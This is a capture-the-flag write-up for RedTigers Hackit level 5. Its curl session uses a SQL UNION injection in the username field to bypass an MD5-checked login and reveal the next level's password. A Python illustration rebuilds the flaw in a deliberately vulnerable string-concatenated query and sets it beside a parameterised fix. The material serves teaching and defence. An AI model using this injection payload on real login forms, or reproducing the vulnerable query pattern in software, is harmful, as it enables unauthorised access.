# RedTigers Hackit wargame: Level 5


```
# curl --silent --insecure --cookie-jar level5 --cookie level5 --request POST --data "password=62616e616e61735f6172655f6e6f745f626c7565&level5login=Login" https://redtiger.dyndns.org/hackit/level5.php
                <b>Welcome to Level 5</b><br><br>
                Target: Bypass the login<br>
                Disabled: substring , substr, ( , ), mid<br>
                Hints: its not a blind, the password is md5-crypted, watch the login errors<br><br><br>

                        <form name="login" action="?mode=login" method="POST">
                                Username: <input name="username" size="30" type="text"><br>
                                Password: <input name="password" size="30" type="text">
                                <br>
                                <input name="login" value="Login" type="submit">
                        </form>
# password="whatever"
# echo -n $password | md5sum
008c5926ca861023c1d2a36653fd88e2  -
# username="' union select 'user','008c5926ca861023c1d2a36653fd88e2"
# curl --silent --insecure --cookie level5 --request POST --data "username=$username&password=$password&login=Login" https://redtiger.dyndns.org/hackit/level5.php?mode=login | grep is:
<br>The password for the next level is: <b>6d795f6361745f736179735f6d656f776d656f77</b> <br><br>
```
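
Why the UNION username in the session above passes the login, next to the fix, as an added example that is not part of the original post or the wargame's code. It assumes the server fetches the row by username through string concatenation and then compares the MD5 of the submitted password with the hash the query returned; the table, function names and stored secret are constructed for illustration.

```python
import hashlib
import hmac
import sqlite3


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    # Constructed table and secret; the wargame's real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", md5_hex("constructed-secret")))
    return db


def union_payload(password):
    # Same shape as the username in the session: no closing quote, because the
    # query's own trailing quote terminates the injected hash literal.
    return "' union select 'user','" + md5_hex(password)


def login_vulnerable(db, username, password):
    # Assumed server pattern: username concatenated into the SQL text, hash
    # check done afterwards on whatever row the query returned.
    sql = "SELECT username, password FROM users WHERE username = '" + username + "'"
    row = db.execute(sql).fetchone()
    return row is not None and row[1] == md5_hex(password)


def login_hardened(db, username, password):
    # Bound parameter: the input can only ever be compared as a value, so the
    # UNION text is looked up as a literal username and matches no row.
    # Unsalted MD5 is kept only to mirror the level; use a password KDF in practice.
    sql = "SELECT username, password FROM users WHERE username = ?"
    row = db.execute(sql, (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[1], md5_hex(password))


if __name__ == "__main__":
    db = make_db()
    attack = union_payload("whatever")
    print("vulnerable, injected:", login_vulnerable(db, attack, "whatever"))
    print("hardened,   injected:", login_hardened(db, attack, "whatever"))
    print("hardened,   real user:", login_hardened(db, "admin", "constructed-secret"))
```

In the vulnerable version the attacker supplies both sides of the hash comparison, which is why no knowledge of the stored password is needed.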
